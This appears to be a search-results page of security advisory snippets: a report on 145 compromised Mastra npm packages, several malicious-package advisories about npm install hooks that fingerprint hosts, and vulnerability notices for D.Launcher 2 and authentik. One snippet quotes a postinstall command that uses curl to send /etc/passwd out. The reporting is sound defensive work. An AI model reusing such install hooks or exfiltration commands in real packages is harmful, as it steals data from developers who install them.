8 matches found
145 Mastra npm Packages Compromised via Hijacked Contributor Account
As many as 145 npm packages associated with the Mastra namespace "@mastra/", a popular open-source JavaScript and TypeScript framework for building artificial intelligence AI applications, have been compromised as part of a software supply chain attack codenamed easy-day-js , per findings from...
Malicious code in @giftyhq/widget-components (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8ad3f12a6a12fbfa60e4a72747df6974f89906200568926b99a8c93c489b5e62 package.json declares "preinstall": "node index.js", which fires automatically on npm install. index.js collects host fingerprinting data —...
MAL-2026-5416 Malicious code in @klapp-otp/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9246974efd1a626094dd3f2027df2e8f1468ce45ebcba42e5207a06c5c9e16ee On npm install, this package auto-executes index.js via the preinstall lifecycle hook. The script collects os.hostname, os.userInfo, dirname,...
MAL-2026-5429 Malicious code in @shell-landing/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577 On npm install, the package's postinstall hook runs node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...
MAL-2026-5425 Malicious code in @oplus/obus-web-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 956ecc19633177f7ef9b458e6407ffbba6c8366688249c07bfd7f3c8e85c17a9 On npm install, the package's scripts/postinstall.js collects the installer's username os.userInfo, hostname os.hostname, current working directory...
CVE-2026-8993 Improper URL Handler Processing in D.Launcher 2 enables NTLM Credential Disclosure and SSRF attacks
D.Launcher 2 component of Slovak eID client ecosystem contains Improper URL Handler Processing vulnerability. Application registers multiple custom URL handlers that could be exploited to initiate full NTLM autentication or SMB connection to attacker infrastructure and to conduct SSRF Server Side...
authentik 输入验证错误漏洞
Authentik is an open-source identity provisioning application. Versions of Authentik prior to 2026.2.3 had a vulnerability related to input validation errors. This vulnerability stemmed from the WS-Federation provider’s use of raw string prefixes for validation instead of proper URL parsing, whic...
MAL-2026-4372 Malicious code in @budetzz/baileys (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c79c7b873a8ea61831fdfd7b987de0efbf8944d2fd407a8dca4b70042a3d029c This package is a republished fork of @whiskeysockets/baileys that adds two undocumented network behaviors. 1 lib/Socket/newsletter.js line 111...